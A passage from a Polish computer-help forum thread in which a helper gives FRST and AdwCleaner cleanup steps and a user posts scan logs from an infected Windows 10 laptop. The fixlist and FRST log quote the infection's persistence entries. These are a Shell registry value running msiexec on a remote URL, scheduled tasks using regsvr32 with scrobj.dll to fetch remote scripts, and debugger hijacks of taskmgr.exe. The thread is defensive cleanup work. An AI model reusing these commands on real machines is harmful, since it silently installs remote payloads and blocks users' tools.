SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2400838556-3398951076-1685541893-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492616643&z=0ad538a9e20e1b8cb51a806g8z1t2ofqbgbq5qezfc&from=che0812&uid=TOSHIBAXMQ01ABD100_46UNP9ZUTXX46UNP9ZUT&q={searchTerms}
IFEO\DisplaySwitch.exe: [Debugger]
IFEO\taskmgr.exe: [Debugger]
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1SNTI5NdlQOTkxFdLWOWY4RTH1MWLLNWQQRjZSFUY2Mq== /q
FirewallRules: [{F7732D69-5F2B-49EF-A088-0C5F55CD4590}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxmq01abd100_46unp9zutxx46unp9zut.dat
FirewallRules: [{250D5170-77A3-49BE-A6F9-959AEB7F445C}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxmq01abd100_46unp9zutxx46unp9zut.dat
FirewallRules: [{4898AC23-F455-499C-9159-EC4048145DCF}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe
FirewallRules: [{6B452E6C-FC12-4789-8ECD-60201D3B8758}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{D0DF2BF7-4CE5-494A-9206-37D9BFD681A1}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
ShortcutWithArgument: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder\WarThunder.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://go.playmmogames.com/aff_c?offer_id=698&aff_id=1034&source=1&click_id=e2fe395430f173bfde38c2993e006e118be6b507
Task: {CE98BF72-99E0-4BDE-AC69-EDC8D0627C93} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] ()
Task: {627837C5-4A24-45D8-8540-1F8FF3948FB9} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1SNTI5NdlQOTkxFdLWOWY4RTH1MWLLNWQQRjZSFUY2Mq== scrobj.dll
Task: {42B3F5AF-883C-4486-9188-2DB20304944E} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1SNTI5NdlQOTkxFdLWOWY4RTH1MWLLNWQQRjZSFUY2Mq== scrobj.dll
C:\Users\Public\Desktop\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
HOSTS:
EmptyTemp:

Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe
Uruchom FRST i kliknij przycisk Fix (NAPRAW).

2) Użyj Adw-Cleaner http://www.programosy.pl/program,adwcleaner.html
najpierw kliknij na SKANUJ (SCAN), a dopiero po zakończeniu skanowania, gdy uaktywni się przycisk USUŃ (CLEANING), to kliknij na niego.
Pokaż raport z niego "C"

3) Uruchom FRST.
W polu SEARCH (SZUKAJ) wklej:
Eastness;

kliknij na przycisk "Search Registry" (Szukaj w Rejestrze).
Raport z tego będzie tam, gdzie jest FRST.

4) Zrób nowe logi FRST.
.

Autor postu otrzymał pochwałę
ordynat
~user
 
Posty: 4419
Dołączenie: 02 Kwi 2010, 11:18
Pochwały: 792



Problem z mozilla i zawieszającym się systemem

Postprzez emillo2502 22 Kwi 2017, 16:25

Adw Cleaner

Kod: Zaznacz wszystko
# AdwCleaner v6.045 - raport utworzono 22/04/2017 o 12:46:48
# Ostatnia aktualizacja: 28/03/2017 przez Malwarebytes
# Baza danych : 2017-04-22.1 [Lokalna]
# System operacyjny : Windows 10 Home  (X64)
# Nazwa użytkownika : Emil - LAPTOP-PH67M221
# Lokalizacja programu : C:\Users\Emil\Downloads\AdwCleaner.exe
# Tryb: Czyszczenie
# Wsparcie : https://www.malwarebytes.com/support



***** [ Usługi ] *****

[-] Usunięto usługę: WindowsOfficeSrv


***** [ Foldery ] *****

[#] Folder usunięto podczas ponownego uruchomienia: C:\Users\Emil\AppData\Roaming\Firefox
[-] Usunięto folder: C:\Users\Emil\AppData\Local\Firefox


***** [ Pliki ] *****

[-] Usunięto plik: C:\Users\Emil\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\ScreenShot.lnk
[-] Usunięto plik: C:\WINDOWS\SysNative\log\iSafeKrnlCall.log
[-] Usunięto plik: C:\ProgramData\Microsoft\Windows\Start Menu\ScreenShot.lnk
[-] Usunięto plik: C:\Users\Public\Documents\temp.dat
[-] Usunięto plik: C:\Users\Public\Documents\report.dat
[-] Usunięto plik: C:\Users\Emil\AppData\Roaming\Mozilla\Firefox\Profiles\zao9ohxy.default\searchplugins\ourluckysites.xml


***** [ DLL ] *****



***** [ WMI ] *****



***** [ Skróty ] *****



***** [ Zaplanowane zadania ] *****

[-] Usunięto zadanie: Software Update Application
[-] Usunięto zadanie: Milimili


***** [ Rejestr ] *****

[-] Usunięto klucz: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\SNARE
[#] Klucz usunięto podczas ponownego uruchomienia: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\SNARE
[-] Usunięto klucz: HKLM\SOFTWARE\Classes\Amazon.AmazonAssistant.AABroker
[-] Usunięto klucz: HKLM\SOFTWARE\Classes\Amazon.AmazonAssistant.Messenger
[-] Usunięto klucz: HKLM\SOFTWARE\Classes\Amazon1ButtonBrowserHelper.Amazon1ButtonBHO
[-] Usunięto klucz: HKLM\SOFTWARE\Classes\Amazon1ButtonRuntime.Amazon1ButtonRuntime
[-] Usunięto klucz: HKLM\SOFTWARE\Classes\Amazon1ButtonRuntime.AmazonRuntimeServer
[-] Usunięto klucz: HKLM\SOFTWARE\Classes\AmazonAppIE.AppGateway
[-] Usunięto klucz: HKLM\SOFTWARE\Classes\AmazonAppIE.GadgetGateway
[#] Klucz usunięto podczas ponownego uruchomienia: [x64] HKLM\SOFTWARE\Classes\Amazon.AmazonAssistant.AABroker
[#] Klucz usunięto podczas ponownego uruchomienia: [x64] HKLM\SOFTWARE\Classes\Amazon.AmazonAssistant.Messenger
[#] Klucz usunięto podczas ponownego uruchomienia: [x64] HKLM\SOFTWARE\Classes\Amazon1ButtonBrowserHelper.Amazon1ButtonBHO
[#] Klucz usunięto podczas ponownego uruchomienia: [x64] HKLM\SOFTWARE\Classes\Amazon1ButtonRuntime.Amazon1ButtonRuntime
[#] Klucz usunięto podczas ponownego uruchomienia: [x64] HKLM\SOFTWARE\Classes\Amazon1ButtonRuntime.AmazonRuntimeServer
[#] Klucz usunięto podczas ponownego uruchomienia: [x64] HKLM\SOFTWARE\Classes\AmazonAppIE.AppGateway
[#] Klucz usunięto podczas ponownego uruchomienia: [x64] HKLM\SOFTWARE\Classes\AmazonAppIE.GadgetGateway
[-] Usunięto klucz: HKLM\SOFTWARE\Classes\CLSID\{BAC72C85-CEC6-4B86-AF06-FA20C259FAB8}
[-] Usunięto klucz: HKLM\SOFTWARE\Classes\CLSID\{BD6ECB00-7C4A-4F97-B425-44117F2A7AAE}
[-] Usunięto klucz: HKLM\SOFTWARE\Classes\CLSID\{6557DB6C-EFE1-45AC-92A6-FBB1554B7502}
[-] Usunięto klucz: HKLM\SOFTWARE\Classes\CLSID\{E4ADC61E-D06A-4E0E-8582-78C809CC8450}
[-] Usunięto klucz: HKLM\SOFTWARE\Classes\Interface\{7BCA6879-A9F8-47DE-AE05-F5CE7EA3A474}
[-] Usunięto klucz: HKLM\SOFTWARE\Classes\TypeLib\{ADF1FA2A-6EAA-4A97-A55F-3C8B92843EF5}
[-] Usunięto klucz: HKLM\SOFTWARE\Classes\TypeLib\{EB2BEAEF-150C-4DE4-9D09-F16403C22769}
[-] Usunięto klucz: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BD6ECB00-7C4A-4F97-B425-44117F2A7AAE}
[-] Usunięto klucz: HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\Software\dobreprogramy
[#] Klucz usunięto podczas ponownego uruchomienia: HKCU\Software\dobreprogramy
[-] Usunięto klucz: HKLM\SOFTWARE\Elex-tech
[-] Usunięto klucz: HKLM\SOFTWARE\ScreenShot
[-] Usunięto klucz: HKLM\SOFTWARE\ourluckysitesSoftware
[-] Usunięto klucz: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WarThunder
[-] Usunięto klucz: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ScreenShot
[#] Klucz usunięto podczas ponownego uruchomienia: [x64] HKCU\Software\dobreprogramy
[-] Usunięto klucz: [x64] HKLM\SOFTWARE\InterSect Alliance
[-] Usunięto klucz: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2B51C83A-465D-4EA9-9CDC-1ED95ED09AC6}
[-] Usunięto klucz: HKLM\SOFTWARE\Classes\Installer\Features\A38C15B2D5649AE4C9CDE19DE50DA96C
[-] Usunięto klucz: HKLM\SOFTWARE\Classes\Installer\Products\A38C15B2D5649AE4C9CDE19DE50DA96C
[-] Usunięto klucz: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\A38C15B2D5649AE4C9CDE19DE50DA96C
[#] Klucz usunięto podczas ponownego uruchomienia: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\A38C15B2D5649AE4C9CDE19DE50DA96C
[#] Klucz usunięto podczas ponownego uruchomienia: [x64] HKLM\SOFTWARE\Classes\Installer\Features\A38C15B2D5649AE4C9CDE19DE50DA96C
[#] Klucz usunięto podczas ponownego uruchomienia: [x64] HKLM\SOFTWARE\Classes\Installer\Products\A38C15B2D5649AE4C9CDE19DE50DA96C
[-] Przywrócono dane: HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\Software\Microsoft\Internet Explorer\Main [Start Page]
[-] Przywrócono dane: HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\Software\Microsoft\Internet Explorer\Main [Default_Page_URL]
[-] Przywrócono dane: HKCU\Software\Microsoft\Internet Explorer\Main [Start Page]
[-] Przywrócono dane: HKCU\Software\Microsoft\Internet Explorer\Main [Default_Page_URL]
[-] Przywrócono dane: HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL]
[-] Przywrócono dane: HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Search_URL]
[-] Przywrócono dane: HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Search Page]
[-] Przywrócono dane: HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
[-] Przywrócono dane: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Start Page]
[-] Przywrócono dane: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Default_Page_URL]
[-] Przywrócono dane: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL]
[-] Przywrócono dane: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Search_URL]
[-] Przywrócono dane: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Search Page]
[-] Przywrócono dane: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
[-] Usunięto klucz: HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
[#] Klucz usunięto podczas ponownego uruchomienia: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
[-] Usunięto klucz: HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
[#] Klucz usunięto podczas ponownego uruchomienia: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
[-] Usunięto klucz: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
[-] Usunięto klucz: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\amazonbrowserapp.com
[-] Usunięto klucz: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\analytics.app.amazonbrowserapp.com
[-] Usunięto klucz: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\castplatform.com
[-] Usunięto klucz: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\cdn.castplatform.com
[#] Klucz usunięto podczas ponownego uruchomienia: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\amazonbrowserapp.com
[#] Klucz usunięto podczas ponownego uruchomienia: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\analytics.app.amazonbrowserapp.com
[#] Klucz usunięto podczas ponownego uruchomienia: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\castplatform.com
[#] Klucz usunięto podczas ponownego uruchomienia: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\cdn.castplatform.com
[-] Usunięto klucz: HKLM\SOFTWARE\Classes\AppID\OverlayIcon.DLL
[-] Usunięto wartość: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [WinSAPSvc]


***** [ Przeglądarki ] *****



*************************

:: Usunięto klucze "Tracing"
:: Zresetowano ustawienia Winsock

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [8509 bajty] - [22/04/2017 12:46:48]
C:\AdwCleaner\AdwCleaner[S0].txt - [9833 bajty] - [20/04/2017 21:40:44]
C:\AdwCleaner\AdwCleaner[S1].txt - [9783 bajty] - [20/04/2017 22:12:22]
C:\AdwCleaner\AdwCleaner[S2].txt - [9759 bajty] - [22/04/2017 12:08:15]
C:\AdwCleaner\AdwCleaner[S3].txt - [9830 bajty] - [22/04/2017 12:16:35]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [8874 bajty] ##########


SearchReg

Kod: Zaznacz wszystko
Farbar Recovery Scan Tool (x64) Wersja: 22-04-2017
Uruchomiony przez Emil (22-04-2017 13:12:24)
Uruchomiony z C:\Users\Emil\Downloads
Tryb startu: Normal

================== Szukaj w rejestrze: "Eastness" ===========

[HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Eastness]
[HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Eastness]
"path"="C:\Program Files (x86)\Eastness\"
[HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Eastness]
"publicdirectroy_du"="C:\Program Files (x86)\Eastness\Reports\Dump"

====== Koniec  Szukaj ======


FRST

Kod: Zaznacz wszystko
Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x64) Wersja: 22-04-2017
Uruchomiony przez Emil (administrator)  LAPTOP-PH67M221 (22-04-2017 13:13:19)
Uruchomiony z C:\Users\Emil\Downloads
Załadowane profile: Emil (Dostępne profile: Emil)
Platform: Windows 10 Home Wersja 1607 (X64) Język: Polski (Polska)
Internet Explorer Wersja 11 (Domyślna przeglądarka: Edge)
Tryb startu: Normal
Instrukcja obsługi Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Procesy (filtrowane) =================

(Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
() C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\AOP Framework\CCDMonitorService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Windows (R) Win 7 DDK provider) C:\Windows\System32\AdminService.exe
() C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantService.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe
(McAfee, Inc.) C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Intel Security, Inc.) C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe
(McAfee, Inc.) C:\Program Files\TrueKey\McTkSchedulerService.exe
() C:\Program Files (x86)\My Connection\ApplicationController.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
() C:\Windows\SysWOW64\PnkBstrB.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\platform\mcsvchost\McSvHost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\VSCore_15_6\mcapexe.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\2.3.253.0\McCSPServiceHost.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Microsoft Corporation) C:\Windows\System32\mshta.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QASvc.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\ePowerButton_NB.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QALSvc.exe
(Microsoft Corporation) C:\Windows\System32\mshta.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QAAgent.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QALockHandler.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QAAdminAgent.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\platform\McUICnt.exe
() C:\OEM\Preload\FubTracking\FubTracking.exe
(Dashlane SAS) C:\Program Files (x86)\Dashlane\Upgrade\DashlaneUpgradeService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.11.523\SSScheduler.exe
(Microsoft Corporation) C:\Windows\System32\mshta.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Windows\System32\mshta.exe
(Acer) C:\Program Files (x86)\Acer\Acer Portal\AcerPortal.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exe
(Acer Cloud Technology) C:\Program Files (x86)\Acer\AOP Framework\acer\ccd.exe
() C:\Program Files (x86)\Acer\Care Center\ACCStd.exe
(acer) C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe

==================== Rejestr (filtrowane) ====================

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [14040792 2015-07-07] (Realtek Semiconductor)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2398776 2016-06-15] (NVIDIA Corporation)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2017-03-28] (Microsoft Corporation)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe [37296 2012-01-03] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [843712 2012-01-02] (Adobe Systems Incorporated)
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1SNTI5NdlQOTkxFdLWOWY4RTH1MWLLNWQQRjZSFUY2Mq== /q
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\MountPoints2: E - "E:\Setup.exe"
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\MountPoints2: F - "F:\setup.exe"
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\MountPoints2: {3c034b37-b73a-11e6-9da4-74dfbf750d6c} - "E:\Setup.exe"
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\MountPoints2: {780173ea-b3bd-11e6-9da1-74dfbf750d6c} - "F:\setup.exe"
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\MountPoints2: {bd31849f-d1b1-11e6-9dab-54ab3abfe915} - "H:\HiSuiteDownLoader.exe"
IFEO\DisplaySwitch.exe: [Debugger]
IFEO\taskmgr.exe: [Debugger]
Lsa: [Notification Packages] scecli C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter
ShellIconOverlayIdentifiers: [ ACloudSynced] -> {5CCE71FA-9F61-4F24-9CD1-98D819B40D68} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2015-10-15] (Acer Incorporated)
ShellIconOverlayIdentifiers: [ ACloudSyncing] -> {C1E1456F-C2D8-4C96-870D-35F1E13941EE} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2015-10-15] (Acer Incorporated)
ShellIconOverlayIdentifiers: [ ACloudToBeSynced] -> {307523FA-DDC0-4068-983F-2A6B34627744} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2015-10-15] (Acer Incorporated)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Brak pliku
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2017-04-02]
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.523\SSScheduler.exe (McAfee, Inc.)

==================== Internet (filtrowane) ====================

(Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.)

Hosts: 0.0.0.1   mssplus.mcafee.com
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{178678cf-1ec5-4aeb-833f-f89587024ab7}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{dbbf9db0-56ad-4631-b98a-46ab3cfd876f}: [DhcpNameServer] 192.168.2.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\Software\Microsoft\Internet Explorer\Main,Start Page =
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-03-06] (Microsoft Corporation)
BHO: McAfee WebAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-04-18] (McAfee, Inc.)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-03-06] (Microsoft Corporation)
BHO-x32: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll [2016-11-02] (Intel Security)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-01-03] (Adobe Systems Incorporated)
BHO-x32: McAfee WebAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-04-18] (McAfee, Inc.)
Toolbar: HKLM-x32 - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll [2016-11-02] (Intel Security)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-04-18] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-04-18] (McAfee, Inc.)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-06] (Microsoft Corporation)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-04-18] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-04-18] (McAfee, Inc.)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\McSnIePl64.dll [2017-03-03] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll [2017-03-03] (McAfee, Inc.)

Edge:
======
